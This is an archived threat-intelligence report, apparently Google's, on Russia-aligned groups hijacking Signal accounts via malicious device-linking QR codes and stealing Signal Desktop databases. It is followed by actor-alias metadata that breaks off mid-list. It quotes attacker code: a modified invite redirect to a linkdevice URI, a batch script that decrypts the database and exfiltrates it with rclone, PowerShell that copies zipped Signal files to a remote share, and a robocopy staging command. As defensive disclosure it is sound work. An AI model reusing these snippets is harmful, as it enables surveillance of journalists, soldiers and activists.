{
	"id": "bb7970f3-7b90-443b-8245-bcee2ca71695",
	"created_at": "2026-04-06T01:32:03.599607Z",
	"updated_at": "2026-04-10T03:37:09.246182Z",
	"deleted_at": null,
	"sha1_hash": "6dafa509fd5d2c83cd3a79a73e2ae8d499983db8",
	"title": "Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively Targeting Signal Messenger",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 500874,
	"plain_text": "Signals of Trouble: Multiple Russia-Aligned Threat Actors Actively\r\nTargeting Signal Messenger\r\nBy Google Threat Intelligence Group\r\nPublished: 2025-02-19 · Archived: 2026-04-06 00:59:05 UTC\r\nWritten by: Dan Black\r\nGoogle Threat Intelligence Group (GTIG) has observed increasing efforts from several Russia state-aligned threat\r\nactors to compromise Signal Messenger accounts used by individuals of interest to Russia's intelligence services.\r\nWhile this emerging operational interest has likely been sparked by wartime demands to gain access to sensitive\r\ngovernment and military communications in the context of Russia's re-invasion of Ukraine, we anticipate the\r\ntactics and methods used to target Signal will grow in prevalence in the near-term and proliferate to additional\r\nthreat actors and regions outside the Ukrainian theater of war.\r\nSignal's popularity among common targets of surveillance and espionage activity—such as military personnel,\r\npoliticians, journalists, activists, and other at-risk communities—has positioned the secure messaging application\r\nas a high-value target for adversaries seeking to intercept sensitive information that could fulfill a range of\r\ndifferent intelligence requirements. More broadly, this threat also extends to other popular messaging applications\r\nsuch as WhatsApp and Telegram, which are also being actively targeted by Russian-aligned threat groups using\r\nsimilar techniques. In anticipation of a wider adoption of similar tradecraft by other threat actors, we are issuing a\r\npublic warning regarding the tactics and methods used to date to help build public awareness and help\r\ncommunities better safeguard themselves from similar threats.\r\nWe are grateful to the team at Signal for their close partnership in investigating this activity. 
The latest Signal\r\nreleases on Android and iOS contain hardened features designed to help protect against similar phishing\r\ncampaigns in the future. Update to the latest version to enable these features.\r\nPhishing Campaigns Abusing Signal's \"Linked Devices\" Feature\r\nThe most novel and widely used technique underpinning Russian-aligned attempts to compromise Signal accounts\r\nis the abuse of the app's legitimate \"linked devices\" feature that enables Signal to be used on multiple devices\r\nconcurrently. Because linking an additional device typically requires scanning a quick-response (QR) code, threat\r\nactors have resorted to crafting malicious QR codes that, when scanned, will link a victim's account to an actor-controlled Signal instance. If successful, future messages will be delivered synchronously to both the victim and\r\nthe threat actor in real-time, providing a persistent means to eavesdrop on the victim's secure conversations\r\nwithout the need for full-device compromise.\r\nIn remote phishing operations observed to date, malicious QR codes have frequently been masked as\r\nlegitimate Signal resources, such as group invites, security alerts, or as legitimate device pairing\r\ninstructions from the Signal website.\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger\r\nPage 1 of 11\n\nIn more tailored remote phishing operations, malicious device-linking QR codes have been embedded in\r\nphishing pages crafted to appear as specialized applications used by the Ukrainian military.\r\nBeyond remote phishing and malware delivery operations, we have also seen malicious QR codes being\r\nused in close-access operations. 
APT44 (aka Sandworm or Seashell Blizzard, a threat actor attributed by\r\nmultiple governments to the Main Centre for Special Technologies (GTsST) within the Main Directorate of the\r\nGeneral Staff of the Armed Forces of the Russian Federation (GU), known commonly as the GRU) has\r\nworked to enable forward-deployed Russian military forces to link Signal accounts on devices captured on\r\nthe battlefield back to actor-controlled infrastructure for follow-on exploitation.\r\nNotably, this device-linking concept of operations has proven to be a low-signature form of initial access due to\r\nthe lack of centralized, technology-driven detections and defenses that can be used to monitor for account\r\ncompromise via newly linked devices; when successful, there is a high risk that a compromise can go unnoticed\r\nfor extended periods of time.\r\nUNC5792: Modified Signal Group Invites\r\nTo compromise Signal accounts using the device-linking feature, one suspected Russian espionage cluster tracked\r\nas UNC5792 (which partially overlaps with CERT-UA's UAC-0195) has altered legitimate \"group invite\" pages\r\nfor delivery in phishing campaigns, replacing the expected redirection to a Signal group with a redirection to a\r\nmalicious URL crafted to link an actor-controlled device to the victim's Signal account.\r\nIn these operations, UNC5792 has hosted modified Signal group invitations on actor-controlled\r\ninfrastructure designed to appear identical to a legitimate Signal group invite.\r\nIn each of the fake group invites, JavaScript code that typically redirects the user to join a Signal group has\r\nbeen replaced by a malicious block containing the Uniform Resource Identifier (URI) used by Signal to\r\nlink a new device to Signal (i.e., \"sgnl://linkdevice?uuid=\"), tricking victims into linking their Signal\r\naccounts to a device controlled by UNC5792.\r\n
Figure 1: Example modified Signal group invite hosted on UNC5792-controlled domain \"signal-groups[.]tech\"\r\nfunction doRedirect() {\r\n  if (window.location.hash) {\r\n    var redirect = \"sgnl://signal.group/\" + window.location.hash\r\n    document.getElementById('go-to-group').href = redirect\r\n    window.location = redirect\r\n  } else {\r\n    document.getElementById('join-button').innerHTML = \"No group found.\"\r\n  }\r\n}\r\nwindow.onload = doRedirect\r\nFigure 2: Typical legitimate group invite code for redirection to a Signal group\r\nfunction doRedirect() {\r\n  var redirect = 'sgnl://linkdevice?uuid=h_8WKmzwam_jtUeoD_NQyg%3D%3D\u0026pub_key=Ba0212mHrGIy4t%2FzCCkKkRKwiS0osyeLF4j1v8DKn%2Fg%2B'\r\n  //redirect=encodeURIComponent(redirect)\r\n  document.getElementById('go-to-group').href = redirect\r\n  window.location = redirect\r\n}\r\nwindow.onload = doRedirect\r\nFigure 3: Example of UNC5792 modified redirect code used to link the victim's device to an actor-controlled\r\nSignal instance\r\nUNC4221: Custom-Developed Signal Phishing Kit\r\nUNC4221 (tracked by CERT-UA as UAC-0185) is an additional Russia-linked threat actor who has actively\r\ntargeted Signal accounts used by Ukrainian military personnel. The group operates a tailored Signal phishing kit\r\ndesigned to mimic components of the Kropyva application used by the Armed Forces of Ukraine for artillery\r\nguidance. Similar to the social engineering approach used by UNC5792, UNC4221 has also attempted to mask its\r\ndevice-linking functionality as an invite to a Signal group from a trusted contact. 
Different variations of this\r\nphishing kit have been observed, including:\r\nPhishing websites that redirect victims to secondary phishing infrastructure masquerading as legitimate\r\ndevice-linking instructions provisioned by Signal (Figure 4)\r\nPhishing websites with the malicious device-linking QR code directly embedded into the primary\r\nKropyva-themed phishing kit (Figure 5)\r\nIn earlier operations in 2022, UNC4221 phishing pages were crafted to appear as a legitimate security alert\r\nfrom Signal (Figure 6)\r\nFigure 4: Malicious device-linking QR code hosted on UNC4221-controlled domain \"signal-confirm[.]site\"\r\nFigure 5: UNC4221 phishing page mimicking the networking component of Kropyva hosted at \"teneta.add-group[.]site\". The page invites the user to \"Sign in to Signal\" (Ukrainian: \"Авторизуватись у Signal\"), which in\r\nturn displays a QR code linked to a UNC4221-controlled Signal instance.\r\nFigure 6: Phishing page crafted to appear as a Signal security alert hosted on UNC4221-controlled domain signal-protect[.]host\r\nNotably, as a core component of its Signal targeting, UNC4221 has also used a lightweight JavaScript payload\r\ntracked as PINPOINT to collect basic user information and geolocation data using the browser's GeoLocation API.\r\nIn general, we expect secure messages and location data to frequently feature as joint targets in future\r\noperations of this nature, particularly in the context of targeted surveillance operations or support to conventional\r\nmilitary operations.\r\nWider Russian and Belarusian Efforts to Steal Messages From Signal\r\nBeyond targeted efforts to link additional actor-controlled devices to victim Signal accounts, multiple known and\r\nestablished regional threat actors have 
also been observed operating capabilities designed to steal Signal database\r\nfiles from Android and Windows devices.\r\nAPT44 has been observed operating WAVESIGN, a lightweight Windows Batch script, to periodically\r\nquery Signal messages from a victim's Signal database and exfiltrate those most recent messages using\r\nRclone (Figure 7).\r\nAs reported in 2023 by the Security Service of Ukraine (SSU) and the UK's National Cyber Security\r\nCentre (NCSC), the Android malware tracked as Infamous Chisel and attributed by the respective\r\norganizations to Sandworm, is designed to recursively search for a list of file extensions including the local\r\ndatabase for a series of messaging applications, including Signal, on Android devices.\r\nTurla, a Russian threat actor attributed by the United States and United Kingdom to Center 16 of the\r\nFederal Security Service (FSB) of the Russian Federation, has also operated a lightweight PowerShell\r\nscript in post-compromise contexts to stage Signal Desktop messages for exfiltration (Figure 8).\r\nExtending beyond Russia, Belarus-linked UNC1151 has used the command-line utility Robocopy to stage\r\nthe contents of file directories used by Signal Desktop to store messages and attachments for later\r\nexfiltration (Figure 9).\r\nif %proflag%==1 (\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n copy /y %new% C:\\ProgramData\\Signal\\Storage\\Signal\\sqlorig\\db.sqlite\r\n C:\\ProgramData\\Signal\\Storage\\rc.exe copy -P -I --log-file=C:\\ProgramData\\Signal\\Storage\\rclog.txt --log-lev\r\n del C:\\ProgramData\\Signal\\Storage\\Signal\\log*\r\n rmdir /s /q C:\\ProgramData\\Signal\\Storage\\sql\r\n move C:\\ProgramData\\Signal\\Storage\\Signal\\sql C:\\ProgramData\\Signal\\Storage\\sql\r\n) ELSE (\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %old% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n 
C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %old% \"PRAGMA key=\"\"x'%key%'\"\";select count(*) from sqlite_maste\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";\" \".recover\" \u003e NUL\r\n C:\\ProgramData\\Signal\\Storage\\sqlcipher.exe %new% \"PRAGMA key=\"\"x'%key%'\"\";select count(*) from sqlite_maste\r\n C:\\ProgramData\\Signal\\Storage\\sqldiff.exe --primarykey --vtab %old_dec% %new_dec% \u003e %diff_name%\r\n del /s %old_dec% %new_dec%\r\n rmdir /s /q C:\\ProgramData\\Signal\\Storage\\sql\r\n move C:\\ProgramData\\Signal\\Storage\\Signal\\sql C:\\ProgramData\\Signal\\Storage\\sql\r\n powershell -Command \"move C:\\ProgramData\\Signal\\Storage\\log.tmp C:\\ProgramData\\Signal\\Storage\\Signal\\log$(Ge\r\n)\r\nFigure 7: Code snippet from WAVESIGN used by APT44 to exfiltrate Signal messages\r\n$TempPath = $env:tmp\r\n$TempPath = $env:temp\r\n$ComputerName = $env:computername\r\n$DFSRoot = \"\\\\redacted\"\r\n$RRoot = $DFSRoot + \"resource\\\"\r\n$frand = Get-Random -Minimum 1 -Maximum 10000\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\sql\\db.sqlite\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" | Out-File $treslocal -Append\r\nGet-ChildItem \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\sql\\db.sqlite\" | Out-File $treslocal -Append\r\n$file1 = $ComputerName + \"_\" + $frand + \"sig.zip\"\r\n$zipfile = $TempPath + \"\\\" + $file1\r\n$resfile = $RRoot + $file1\r\nCompress-Archive -Path \"C:\\Users\\..\\AppData\\Roaming\\SIGNAL\\config.json\" -DestinationPath $zipfile\r\nCopy-Item -Path $zipfile -Destination $resfile -Force\r\nRemove-Item -Path $zipfile -Force\r\nFigure 8: PowerShell script used by Turla to exfiltrate Signal 
messages\r\nC:\\Windows\\system32\\cmd.exe /C cd %appdata% \u0026\u0026 robocopy\r\n\"%userprofile%\\AppData\\Roaming\\Signal\" C:\\Users\\Public\\data\\signa /S\r\nFigure 9: Robocopy command used by UNC1151 to stage Signal file directories for exfiltration\r\nOutlook and Implications\r\nThe operational emphasis on Signal from multiple threat actors in recent months serves as an important warning\r\nfor the growing threat to secure messaging applications that is certain to intensify in the near-term. When placed in\r\na wider context with other trends in the threat landscape, such as the growing commercial spyware industry and\r\nthe surge of mobile malware variants being leveraged in active conflict zones, there appears to be a clear and\r\ngrowing demand for offensive cyber capabilities that can be used to monitor the sensitive communications of\r\nindividuals who rely on secure messaging applications to safeguard their online activity.\r\nAs reflected in wide-ranging efforts to compromise Signal accounts, this threat to secure messaging applications is\r\nnot limited to remote cyber operations such as phishing and malware delivery, but also critically includes close-access operations where a threat actor can secure brief access to a target's unlocked device. Equally important, this\r\nthreat is not only limited to Signal, but also extends to other widely used messaging platforms, including\r\nWhatsApp and Telegram, which have likewise factored into the targeting priorities of several of the\r\naforementioned Russia-aligned groups in recent months. For an example of this wider targeting interest, see\r\nMicrosoft Threat Intelligence's recent blog post on a COLDRIVER (aka UNC4057 and Star Blizzard) campaign\r\nattempting to abuse the linked device feature to compromise WhatsApp accounts.  
\r\nPotential targets of government-backed intrusion activity targeting their personal devices should adopt practices to\r\nhelp safeguard themselves, including:\r\nEnable screen lock on all mobile devices using a long, complex password with a mix of uppercase and\r\nlowercase letters, numbers, and symbols. Android supports alphanumeric passwords, which offer\r\nsignificantly more security than numeric-only PINs or patterns.\r\nInstall operating system updates as soon as possible and always use the latest version of Signal and other\r\nmessaging apps.\r\nEnsure Google Play Protect is enabled, which is on by default on Android devices with Google Play\r\nServices. Google Play Protect checks your apps and devices for harmful behavior and can warn users or\r\nblock apps known to exhibit malicious behavior, even when those apps come from sources outside of Play.\r\nAudit linked devices regularly for unauthorized devices by navigating to the \"Linked devices\" section in\r\nthe application's settings.\r\nExercise caution when interacting with QR codes and web resources purporting to be software updates,\r\ngroup invites, or other notifications that appear legitimate and urge immediate action.\r\nIf available, use two-factor authentication such as fingerprint, facial recognition, a security key, or a one-time code to verify when your account is logged into or linked to a new device.\r\niPhone users concerned about targeted surveillance or espionage activity should consider enabling\r\nLockdown Mode to reduce their attack surface.\r\nIndicators of Compromise\r\nTo assist organizations hunting and identifying activity outlined in this blog post, we have included indicators of\r\ncompromise (IOCs) in a GTI Collection for registered users.\r\nSee Table 1 for a sample of relevant indicators of compromise.\r\n
Actor | Indicator of Compromise | Context\r\nUNC5792 | e078778b62796bab2d7ab2b04d6b01bf | Example of altered group invite HTML code\r\nUNC5792 | add-signal-group[.]com | Fake group invite phishing pages\r\nUNC5792 | add-signal-groups[.]com | Fake group invite phishing pages\r\nUNC5792 | group-signal[.]com | Fake group invite phishing pages\r\nUNC5792 | groups-signal[.]site | Fake group invite phishing pages\r\nUNC5792 | signal-device-off[.]online | Fake group invite phishing pages\r\nUNC5792 | signal-group-add[.]com | Fake group invite phishing pages\r\nUNC5792 | signal-group[.]site | Fake group invite phishing pages\r\nUNC5792 | signal-group[.]tech | Fake group invite phishing pages\r\nUNC5792 | signal-groups-add[.]com | Fake group invite phishing pages\r\nUNC5792 | signal-groups[.]site | Fake group invite phishing pages\r\nUNC5792 | signal-groups[.]tech | Fake group invite phishing pages\r\nUNC5792 | signal-security[.]online | Fake group invite phishing pages\r\nUNC5792 | signal-security[.]site | Fake group invite phishing pages\r\nUNC5792 | signalgroup[.]site | Fake group invite phishing pages\r\nUNC5792 | signals-group[.]com | Fake group invite phishing pages\r\nUNC4221 | signal-confirm[.]site | Device-linking instructions phishing page\r\nUNC4221 | confirm-signal[.]site | Device-linking instructions phishing page\r\nUNC4221 | signal-protect[.]host | Fake Signal security alert\r\nUNC4221 | teneta.join-group[.]online | Fake Kropyva group invites\r\nUNC4221 | teneta.add-group[.]site | Fake Kropyva group invites\r\nUNC4221 | group-teneta[.]online | Fake Kropyva group invites\r\nUNC4221 | helperanalytics[.]ru | Fake Kropyva group invites\r\nUNC4221 | teneta[.]group | Fake Kropyva group invites\r\nUNC4221 | group.kropyva[.]site | Fake Kropyva group invites\r\nAPT44 | 150.107.31[.]194:18000 | Dynamically generated device-linking QR code provisioned by APT44\r\nAPT44 | a97a28276e4f88134561d938f60db495 | WAVESIGN batch scripts\r\nAPT44 | b379d8f583112cad3cf60f95ab3a67fd | WAVESIGN batch scripts\r\nAPT44 | b27ff24870d93d651ee1d8e06276fa98 | WAVESIGN batch scripts\r\nTable 1: Relevant indicators of compromise\r\nSee Table 2 for a summary of the different actors, tactics, and techniques used by Russia and Belarus state-aligned\r\nthreat actors to target Signal messages.\r\n
Threat Actor | Tactic | Technique\r\nUNC5792 | Linked device | Remote phishing operations using fake group invites to pair a victim's Signal messages to an actor-controlled device\r\nUNC4221 | Linked device | Remote phishing operations using fake military web applications and security alerts to pair a victim's Signal messages to an actor-controlled device\r\nAPT44 | Linked device | Close-access physical device exploitation to pair a victim's Signal messages to an actor-controlled device\r\nAPT44 | Signal Android database theft | Android malware (Infamous Chisel) tailored to exfiltrate Signal database files\r\nAPT44 | Signal Desktop database theft | Windows Batch script tailored to periodically exfiltrate recent Signal messages via Rclone\r\nTurla | Signal Desktop database theft | Post-compromise activity in Windows environments\r\nUNC1151 | Signal Desktop database theft | Use of Robocopy to stage Signal Desktop file directories for exfiltration\r\nTable 2: Summary of observed threat activity targeting Signal messages\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger"
	],
	"report_names": [
		"russia-targeting-signal-messenger"
	],
	"threat_actors": [
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "f29188d8-2750-4099-9199-09a516c58314",
			"created_at": "2025-08-07T02:03:25.068489Z",
			"updated_at": "2026-04-10T02:00:03.827361Z",
			"deleted_at": null,
			"main_name": "MOONSCAPE",
			"aliases": [
				"TA445 ",
				"UAC-0051 ",
				"UNC1151 "
			],
			"source_name": "Secureworks:MOONSCAPE",
			"tools": [],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "79bd28a6-dc10-419b-bee7-25511ae9d3d4",
			"created_at": "2023-01-06T13:46:38.581534Z",
			"updated_at": "2026-04-10T02:00:03.029872Z",
			"deleted_at": null,
			"main_name": "Callisto",
			"aliases": [
				"BlueCharlie",
				"Star Blizzard",
				"TAG-53",
				"Blue Callisto",
				"TA446",
				"IRON FRONTIER",
				"UNC4057",
				"COLDRIVER",
				"SEABORGIUM",
				"GOSSAMER BEAR"
			],
			"source_name": "MISPGALAXY:Callisto",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "119c8bea-816e-4799-942b-ff375026671e",
			"created_at": "2022-10-25T16:07:23.957309Z",
			"updated_at": "2026-04-10T02:00:04.807212Z",
			"deleted_at": null,
			"main_name": "Operation Ghostwriter",
			"aliases": [
				"DEV-0257",
				"Operation Asylum Ambuscade",
				"PUSHCHA",
				"Storm-0257",
				"TA445",
				"UAC-0051",
				"UAC-0057",
				"UNC1151",
				"White Lynx"
			],
			"source_name": "ETDA:Operation Ghostwriter",
			"tools": [
				"Agentemis",
				"Cobalt Strike",
				"CobaltStrike",
				"HALFSHELL",
				"Impacket",
				"RADIOSTAR",
				"VIDEOKILLER",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a97cf06d-c2e2-4771-99a2-c9dee0d6a0ac",
			"created_at": "2022-10-25T16:07:24.349252Z",
			"updated_at": "2026-04-10T02:00:04.949821Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"ATK 13",
				"Belugasturgeon",
				"Blue Python",
				"CTG-8875",
				"G0010",
				"Group 88",
				"ITG12",
				"Iron Hunter",
				"Krypton",
				"Makersmark",
				"Operation Epic Turla",
				"Operation Moonlight Maze",
				"Operation Penguin Turla",
				"Operation Satellite Turla",
				"Operation Skipper Turla",
				"Operation Turla Mosquito",
				"Operation WITCHCOVEN",
				"Pacifier APT",
				"Pensive Ursa",
				"Popeye",
				"SIG15",
				"SIG2",
				"SIG23",
				"Secret Blizzard",
				"TAG-0530",
				"Turla",
				"UNC4210",
				"Venomous Bear",
				"Waterbug"
			],
			"source_name": "ETDA:Turla",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"ATI-Agent",
				"AdobeARM",
				"Agent.BTZ",
				"Agent.DNE",
				"ApolloShadow",
				"BigBoss",
				"COMpfun",
				"Chinch",
				"Cloud Duke",
				"CloudDuke",
				"CloudLook",
				"Cobra Carbon System",
				"ComRAT",
				"DoublePulsar",
				"EmPyre",
				"EmpireProject",
				"Epic Turla",
				"EternalBlue",
				"EternalRomance",
				"GoldenSky",
				"Group Policy Results Tool",
				"HTML5 Encoding",
				"HyperStack",
				"IcedCoffee",
				"IronNetInjector",
				"KSL0T",
				"Kapushka",
				"Kazuar",
				"KopiLuwak",
				"Kotel",
				"LOLBAS",
				"LOLBins",
				"LightNeuron",
				"Living off the Land",
				"Maintools.js",
				"Metasploit",
				"Meterpreter",
				"MiamiBeach",
				"Mimikatz",
				"MiniDionis",
				"Minit",
				"NBTscan",
				"NETTRANS",
				"NETVulture",
				"Neptun",
				"NetFlash",
				"NewPass",
				"Outlook Backdoor",
				"Penquin Turla",
				"Pfinet",
				"PowerShell Empire",
				"PowerShellRunner",
				"PowerShellRunner-based RPC backdoor",
				"PowerStallion",
				"PsExec",
				"PyFlash",
				"QUIETCANARY",
				"Reductor RAT",
				"RocketMan",
				"SMBTouch",
				"SScan",
				"Satellite Turla",
				"SilentMoon",
				"Sun rootkit",
				"TTNG",
				"TadjMakhal",
				"Tavdig",
				"TinyTurla",
				"TinyTurla Next Generation",
				"TinyTurla-NG",
				"Topinambour",
				"Tunnus",
				"Turla",
				"Turla SilentMoon",
				"TurlaChopper",
				"Uroburos",
				"Urouros",
				"WCE",
				"WITCHCOVEN",
				"WhiteAtlas",
				"WhiteBear",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Wipbot",
				"WorldCupSec",
				"XTRANS",
				"certutil",
				"certutil.exe",
				"gpresult",
				"nbtscan",
				"nbtstat",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3aedca2f-6f6c-4470-af26-a46097d3eab5",
			"created_at": "2024-11-01T02:00:52.689773Z",
			"updated_at": "2026-04-10T02:00:05.396502Z",
			"deleted_at": null,
			"main_name": "Star Blizzard",
			"aliases": [
				"Star Blizzard",
				"SEABORGIUM",
				"Callisto Group",
				"TA446",
				"COLDRIVER"
			],
			"source_name": "MITRE:Star Blizzard",
			"tools": [
				"Spica"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a7ff9823-17a0-4fcd-955e-ade8164bd827",
			"created_at": "2024-12-21T02:00:02.861322Z",
			"updated_at": "2026-04-10T02:00:03.7962Z",
			"deleted_at": null,
			"main_name": "UAC-0185",
			"aliases": [
				"UNC4221"
			],
			"source_name": "MISPGALAXY:UAC-0185",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8a33d3ac-14ba-441c-92c1-39975e9e1a73",
			"created_at": "2023-01-06T13:46:39.195689Z",
			"updated_at": "2026-04-10T02:00:03.243054Z",
			"deleted_at": null,
			"main_name": "Ghostwriter",
			"aliases": [
				"UAC-0057",
				"UNC1151",
				"TA445",
				"PUSHCHA",
				"Storm-0257",
				"DEV-0257"
			],
			"source_name": "MISPGALAXY:Ghostwriter",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a97fee0d-af4b-4661-ae17-858925438fc4",
			"created_at": "2023-01-06T13:46:38.396415Z",
			"updated_at": "2026-04-10T02:00:02.957137Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"TAG_0530",
				"Pacifier APT",
				"Blue Python",
				"UNC4210",
				"UAC-0003",
				"VENOMOUS Bear",
				"Waterbug",
				"Pfinet",
				"KRYPTON",
				"Popeye",
				"SIG23",
				"ATK13",
				"ITG12",
				"Group 88",
				"Uroburos",
				"Hippo Team",
				"IRON HUNTER",
				"MAKERSMARK",
				"Secret Blizzard",
				"UAC-0144",
				"UAC-0024",
				"G0010"
			],
			"source_name": "MISPGALAXY:Turla",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "d11c89bb-1640-45fa-8322-6f4e4053d7f3",
			"created_at": "2022-10-25T15:50:23.509601Z",
			"updated_at": "2026-04-10T02:00:05.277674Z",
			"deleted_at": null,
			"main_name": "Turla",
			"aliases": [
				"Turla",
				"IRON HUNTER",
				"Group 88",
				"Waterbug",
				"WhiteBear",
				"Krypton",
				"Venomous Bear",
				"Secret Blizzard",
				"BELUGASTURGEON"
			],
			"source_name": "MITRE:Turla",
			"tools": [
				"PsExec",
				"nbtstat",
				"ComRAT",
				"netstat",
				"certutil",
				"KOPILUWAK",
				"IronNetInjector",
				"LunarWeb",
				"Arp",
				"Uroburos",
				"PowerStallion",
				"Kazuar",
				"Systeminfo",
				"LightNeuron",
				"Mimikatz",
				"Tasklist",
				"LunarMail",
				"HyperStack",
				"NBTscan",
				"TinyTurla",
				"Penquin",
				"LunarLoader"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2d06d270-acfd-4db8-83a8-4ff68b9b1ada",
			"created_at": "2022-10-25T16:07:23.477794Z",
			"updated_at": "2026-04-10T02:00:04.625004Z",
			"deleted_at": null,
			"main_name": "Cold River",
			"aliases": [
				"Blue Callisto",
				"BlueCharlie",
				"Calisto",
				"Cobalt Edgewater",
				"Gossamer Bear",
				"Grey Pro",
				"IRON FRONTIER",
				"Mythic Ursa",
				"Nahr Elbard",
				"Nahr el bared",
				"Seaborgium",
				"Star Blizzard",
				"TA446",
				"TAG-53",
				"UNC4057"
			],
			"source_name": "ETDA:Cold River",
			"tools": [
				"Agent Drable",
				"AgentDrable",
				"DNSpionage",
				"LOSTKEYS",
				"SPICA"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3a057a97-db21-4261-804b-4b071a03c124",
			"created_at": "2024-06-04T02:03:07.953282Z",
			"updated_at": "2026-04-10T02:00:03.813595Z",
			"deleted_at": null,
			"main_name": "IRON FRONTIER",
			"aliases": [
				"Blue Callisto ",
				"BlueCharlie ",
				"CALISTO ",
				"COLDRIVER ",
